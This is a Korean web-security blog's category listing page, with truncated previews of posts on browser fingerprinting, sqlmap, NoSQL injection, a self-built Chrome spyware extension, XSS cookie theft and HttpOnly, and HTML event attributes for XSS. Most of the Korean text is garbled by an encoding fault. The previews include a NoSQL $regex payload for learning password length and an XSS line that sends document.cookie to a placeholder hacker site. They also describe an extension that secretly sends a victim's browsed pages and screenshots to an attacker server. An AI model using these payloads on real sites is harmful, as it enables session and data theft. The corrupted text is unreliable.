๋ณธ๋ฌธ ๋ฐ”๋กœ๊ฐ€๊ธฐ
728x90
๋ฐ˜์‘ํ˜•

๐Ÿ”’์ •๋ณด๋ณด์•ˆ/์›น ๋ณด์•ˆ20

์›น ํ•ดํ‚น - ๋ธŒ๋ผ์šฐ์ € ํ•‘๊ฑฐํ”„๋ฆฐํŠธ ํ™•์ธ ์‚ฌ์ดํŠธ https://browserleaks.com/ BrowserLeaks - Web Browser Fingerprinting - Browsing Privacy BrowserLeaks.com is all about browsing privacy and web browser fingerprinting. Here you will find a gallery of web browser security testing tools that will show you what kind of personal identity data can be leaked while browsing the Internet. browserleaks.com IP ์ฃผ์†Œ๋ถ€ํ„ฐ ์‹œ์ž‘ํ•ด์„œ FLash Player, Silverlight๊นŒ์ง€ ๊ฐ์ข… ๋ธŒ๋ผ์šฐ์ €์˜ .. 2022. 8. 27.
์›น ํ•ดํ‚น - ํด๋ผ์ด์–ธํŠธ์˜ ํ•‘๊ฑฐํ”„๋ฆฐํŠธ ํ™•์ธํ•˜๊ธฐ(ClientJS) const client = new ClientJS(); client.getBrowserData(); client.getFingerprint(); client.getCustomFingerprint(...); client.getUserAgent(); client.getUserAgentLowerCase(); client.getBrowser(); client.getBrowserVersion(); client.getBrowserMajorVersion(); client.isIE(); client.isChrome(); client.isFirefox(); client.isSafari(); client.isOpera(); client.getEngine(); client.getEngineVersion(); client.g.. 2022. 8. 15.
์›น ํ•ดํ‚น - sqlmap sqlmap์€ ํŒŒ์ด์ฌ์œผ๋กœ ์ž‘์„ฑ๋œ ์˜คํ”ˆ ์†Œ์Šค SQL Injection ์ž๋™ํ™” ๋„๊ตฌ์ด๋‹ค. MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access ๋“ฑ ๋‹ค์–‘ํ•œ DBMS๋“ค์„ ์ง€์›ํ•˜๊ณ  boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band ๊ณต๊ฒฉ ๋ฐฉ์‹๋“ค์„ ์ง€์›ํ•œ๋‹ค๊ณ  ํ•œ๋‹ค. ์ด๋ ‡๊ฒŒ๋‚˜ ๋‹ค์–‘ํ•œ ์˜ต์…˜์„ ๋‹ค ์ž๋™์ ์œผ๋กœ ํ•ด์ฃผ๊ธฐ ๋•Œ๋ฌธ์— ์“ฐ์ง€ ์•Š์„ ์ด์œ ๊ฐ€ ์—†๋‹ค. ๋” ์ž์„ธํ•œ ๋‚ด์šฉ์€ ์ง์ ‘ ๊ณต์‹ ์‚ฌ์ดํŠธ์—์„œ ํ™•์ธ ๊ฐ€๋Šฅ https://sqlmap.org/ sqlmap: automatic SQL injection and database takeover .. 2022. 7. 24.
์›น ํ•ดํ‚น - ์›น ํŒจํ‚ท ์ „์†ก ํ™•์žฅ ํ”„๋กœ๊ทธ๋žจ https://chrome.google.com/webstore/detail/talend-api-tester-free-ed/aejoelaoggembcahagimdiliamlcdmfm Talend API Tester - Free Edition Visually interact with REST, SOAP and HTTP APIs. chrome.google.com ์›น ์„œ๋ฒ„ API๋ฅผ ํ…Œ์ŠคํŠธํ•  ๋•Œ ๋„์›€์ด ๋˜๋Š” ํ™•์žฅ ํ”„๋กœ๊ทธ๋žจ์ž…๋‹ˆ๋‹ค. ์ด์ „๊นŒ์ง€๋Š” POSTMAN์„ ์ฃผ๋กœ ์‚ฌ์šฉํ–ˆ๋Š”๋ฐ ์ด ๋…€์„์€ ๋ธŒ๋ผ์šฐ์ €์—์„œ ์กฐ์ž‘์ด ๊ฐ€๋Šฅํ•˜๋ฉฐ, ์‹ฌ์ง€์–ด ๋ธŒ๋ผ์šฐ์ €๊ฐ€ ๊ฐ€์ง€๊ณ  ์žˆ๋Š” ์ฟ ํ‚ค ๊ฐ’๋„ ํ•จ๊ป˜ ์ „๋‹ฌ์ด ๊ฐ€๋Šฅํ•ฉ๋‹ˆ๋‹ค. ํŽ˜์ด์ง€์— ๋กœ๊ทธ์ธ์ด ํ•„์š”ํ•œ ๊ฒฝ์šฐ์— ์•„์ฃผ ํŽธ๋ฆฌํ•ฉ๋‹ˆ๋‹ค. ๊ทธ๋ฆฌ๊ณ  ์ž‘์„ฑํ•œ ์š”์ฒญ ์ •๋ณด๋“ค์„ ๋ธŒ๋ผ์šฐ์ €์— ์ €์žฅ๋„ ํ•  ์ˆ˜ ์žˆ์Œ. ๋‹จ์ : ์‹œํฌ๋ฆฟ ๋ชจ๋“œ์—์„œ ์‚ฌ์šฉ.. 2021. 12. 9.
์›น ํ•ดํ‚น - NoSQL Injection ์กฐ๊ฑด ํ‘œํ˜„์‹ https://book.hacktricks.xyz/pentesting-web/nosql-injection NoSQL injection - HackTricks Brute-force login usernames and passwords from POST login book.hacktricks.xyz [$ne] : ๊ฐ™์ง€ ์•Š์„ ๊ฒฝ์šฐ(not equals) [$regex] : ์ •๊ทœํ‘œํ˜„์‹ [$eq] : ๊ฐ™๋‹ค(=) [$lt] : ์ž‘๋‹ค() [$lte] : ์ž‘๊ฑฐ๋‚˜ ๊ฐ™๋‹ค() $regex๋กœ ํŒจ์Šค์›Œ๋“œ ๊ธธ์ด ์•Œ์•„๋‚ด๊ธฐ "password": {"$regex":".{1}"} => admin "password": {"$regex":".{2}"} => admin ... "password": {"$regex":".{5}"} => admin.. 2021. 12. 9.
์›น ํ•ดํ‚น - ํฌ๋กฌ ์ŠคํŒŒ์ด์›จ์–ด ํ™•์žฅ ํ”„๋กœ๊ทธ๋žจ , Bad Extension ํฌ๋กฌ ํ™•์žฅ์ž๋ฅผ ์ด์šฉํ•ด ๋ธŒ๋ผ์šฐ์ € ์ „์šฉ ์ŠคํŒŒ์ด์›จ์–ด๋ฅผ ๋งŒ๋“ค์–ด๋ณด์•˜์Šต๋‹ˆ๋‹ค. ์šฐ์„  ๋Œ€์ƒ์˜ ์ปดํ“จํ„ฐ์— ์„ค์น˜๋ฅผ ํ•˜๋Š” ๊ฑด ์ƒ์ƒ์— ๋งก๊ธฐ๊ณ , ํ™•์žฅ ํ”„๋กœ๊ทธ๋žจ์„ ์„ค์น˜ํ•˜๊ฒŒ ๋˜๋ฉด ๋ณ„ ๋‹ค๋ฅธ ์ด์ƒ ์ฆ์ƒ์€ ์—†์Šต๋‹ˆ๋‹ค. ํ™•์žฅ ํ”„๋กœ๊ทธ๋žจ ์•„์ด์ฝ˜์„ ํด๋ฆญํ•ด๋„ ๋ณ„ ๋‹ค๋ฅธ ๊ธฐ๋Šฅ์€ ์—†์Šต๋‹ˆ๋‹ค. ํ•˜์ง€๋งŒ ๋งŒ์•ฝ ์œ ์ €๊ฐ€ ๋‹ค๋ฅธ ํŽ˜์ด์ง€๋กœ ์ด๋™์„ ํ•  ๊ฒฝ์šฐ๊ฐ€ ์ƒ๊ธฐ๋ฉด ๊ณต๊ฒฉ์ž์˜ PC์—๋Š” ์œ ์ €๊ฐ€ ๋Œ์•„๋‹ค๋‹Œ ํŽ˜์ด์ง€์˜ html ํŒŒ์ผ๊ณผ ์Šคํฌ๋ฆฐ์ƒท ํŒŒ์ผ์„ ๋‹ค์šด๋กœ๋“œ ๋ฐ›๊ฒŒ ๋ฉ๋‹ˆ๋‹ค. ์›๋ฆฌ: ๊ณต๊ฒฉ์ž๊ฐ€ ํŒŒ์ด์ฌ Flask๋กœ CDN(์ฝ˜ํ…์ธ  ์ „์†ก ๋„คํŠธ์›Œํฌ) ์„œ๋ฒ„๋ฅผ ์—ด๊ฒŒ ๋ฉ๋‹ˆ๋‹ค. ์ด ์•…์„ฑ ํ™•์žฅ ํ”„๋กœ๊ทธ๋žจ์€ ํŽ˜์ด์ง€๋ฅผ ์ด๋™ํ•  ๋•Œ๋งˆ๋‹ค ๊ณต๊ฒฉ์ž์—๊ฒŒ ์ž๋ฐ”์Šคํฌ๋ฆฝํŠธ ์ฝ˜ํ…์ธ  ํŒŒ์ผ์„ ์š”๊ตฌ๋ฅผ ํ•˜๊ฒŒ ๋˜๊ณ , ๊ณต๊ฒฉ์ž ์„œ๋ฒ„๋Š” ์ฝ˜ํ…์ธ ๋ฅผ ์ œ๊ณต์„ ํ•˜๊ฒŒ ๋ฉ๋‹ˆ๋‹ค. ๊ทธ ์ œ๊ณต๋ฐ›๋Š” ์ž๋ฐ”์Šคํฌ๋ฆฝํŠธ ํŒŒ์ผ์—๋Š” ๋ฐ์ดํ„ฐ๋ฅผ ์ „์†กํ•˜๋Š” ajax ์Šคํฌ๋ฆฝํŠธ์™€ ๋ฌธ์„œ.. 2021. 12. 8.
์›น ํ•ดํ‚น - XSS ๊ณต๊ฒฉ์œผ๋กœ document.cookie ์ •๋ณด ๊ฐ€์ ธ์˜ค๊ธฐ ๋ฐฉ์ง€(HttpOnly) ํ•ด์ปค๋Š” ์•„๋ž˜์ฒ˜๋Ÿผ document.cookie๋ฅผ ํ†ตํ•ด ์ค‘์š”ํ•œ ์ฟ ํ‚ค ์ •๋ณด๋“ค์„ ์ˆ˜์ง‘ํ•˜๋Š” ๊ฒŒ ์ผ๋ฐ˜์  location.href = 'http://ํ•ด์ปค์‚ฌ์ดํŠธ/?cookies=' + document.cookie; ์„œ๋ฒ„๊ฐ€ ํด๋ผ์ด์–ธํŠธ์—๊ฒŒ ์ฟ ํ‚ค ๊ฐ’์„ ์ง€์ •ํ•  ๋•Œ์— HttpOnly๋ผ๋Š” ์˜ต์…˜์„ ์ถ”๊ฐ€์‹œ์ผœ์ฃผ๋ฉด, (HttpOnly๊ฐ€ Http๋งŒ ํ—ˆ์šฉํ•˜๊ณ , Https๋Š” ํ—ˆ์šฉํ•˜์ง€ ์•Š๋Š”๋‹ค ์ด๊ฒŒ ์•„๋‹ˆ๋‹ค..) ํด๋ผ์ด์–ธํŠธ๊ฐ€ document.cookie๋ฅผ ์•„๋ฌด๋ฆฌ ์ถœ๋ ฅํ•ด ๋ณด์•„๋„ ํ•ด๋‹น ์ฟ ํ‚ค์— ๋Œ€ํ•œ ์ •๋ณด๋Š” ์ถœ๋ ฅ์ด ๋˜์ง€ ์•Š๋Š”๋‹ค. Set-Cookie: ์ฟ ํ‚ค๋ช…=์ฟ ํ‚ค๊ฐ’; path=/; HttpOnly HttpOnly ์„ค์ •์„ ํ•œ ์ฟ ํ‚ค๋Š” ๋ธŒ๋ผ์šฐ์ €๊ฐ€ ์ ‘๊ทผ์„ ํ•  ์ˆ˜ ์—†๋„๋ก ๋˜๋ฒ„๋ฆฐ ๊ฒƒ. ๋‹น์—ฐํžˆ ์„œ๋ฒ„์—๊ฒŒ GET, POST ์š”์ฒญ๋“ฑ์„ ํ•  ๋•Œ์—๋Š” HttpOnly ์„ค์ •๋œ ์ฟ ํ‚ค.. 2021. 11. 25.
[WEB-HACKING] HTML ์ด๋ฒคํŠธ ์†์„ฑ ๋ชจ์Œ & XSS ์‘์šฉ ์•„๋ž˜์˜ ์ด๋ฒคํŠธ ์†์„ฑ๋“ค์€ ๋ชจ๋‘ Script(์ž๋ฐ”์Šคํฌ๋ฆฝํŠธ)์˜ ๊ฐ’๋งŒ์„ ๋ฐ›๊ณ  ์žˆ์œผ๋ฉฐ, ์‚ฌ์šฉ์ž๊ฐ€ ํŠน์ • ์กฐ๊ฑด์„ ๋งŒ์กฑํ•˜๊ฒŒ ๋˜๋ฉด ์ด๋ฒคํŠธ๊ฐ€ ๋ฐœ์ƒ์„ ํ•˜๊ฒŒ ๋ฉ๋‹ˆ๋‹ค. [Window Event Attributes] onafterprint onbeforeprint onbeforeunload onerror onhashchange onload onmessage onoffline ononline onpagehide onpageshow onpopstate onresize onstorage onunload [Form Events] onblur onchange oncontextmenu onfocus oninput oninvalid onreset onsearch onselect onsubmit [Mouse Events] onclick ond.. 2021. 11. 15.
728x90
๋ฐ˜์‘ํ˜•